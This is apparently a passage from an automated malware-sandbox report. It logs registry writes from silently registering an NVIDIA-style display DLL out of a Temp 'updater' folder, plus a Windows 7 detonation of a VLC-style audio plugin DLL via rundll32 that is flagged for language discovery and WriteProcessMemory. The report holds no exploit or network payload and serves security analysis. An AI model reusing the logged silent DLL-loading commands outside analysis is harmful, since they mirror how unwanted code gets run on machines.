Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ProgID\ = "DisplayServer.RotateDisplay.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1\ = "SetupDigitalAudio Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID\ = "DisplayServer.VideoAudioControl.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.IdentifyDisp.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiMon.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{894BF76C-115F-44B7-9B32-ABFA7E6A804A}\ProgID\ = "DisplayServer.MultiView.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos.1\CLSID\ = "{074BFFFD-4E50-42c1-A7EB-40D9D70F2471}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustSizePosExt\CLSID\ = "{6539579C-2657-45E5-985F-835E197959C2}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\ = "CustomRez Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\ = "MultiMon Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\VersionIndependentProgID\ = "DisplayServer.VideoHDCPStatus" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\VersionIndependentProgID\ = "DisplayServer.Config" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ = "RotateDisplay Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID\ = "{01367108-5EE2-4E1C-A8DE-24438065ABC9}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\ProgID\ = "DisplayServer.IdentifyDisp.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\CurVer\ = "DisplayServer.CustomRez.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{49F585C0-CE12-4306-9100-B6A28857B10B}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl\CurVer\ = "DisplayServer.VideoAudioControl.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\VersionIndependentProgID\ = "DisplayServer.AdjustSizePosExt" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB}\ = "TVWizard Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID\ = "{80BA3813-908F-4D4C-A5FF-263640AD5B7A}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CurVer\ = "DisplayServer.DualView.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID\ = "{EEF5290C-7F3D-4640-93F2-F189DC616510}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\ProgID\ = "DisplayServer.AdjustSizePosExt.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiView.1\CLSID\ = "{894BF76C-115F-44B7-9B32-ABFA7E6A804A}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CLSID C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Network

N/A

Files

N/A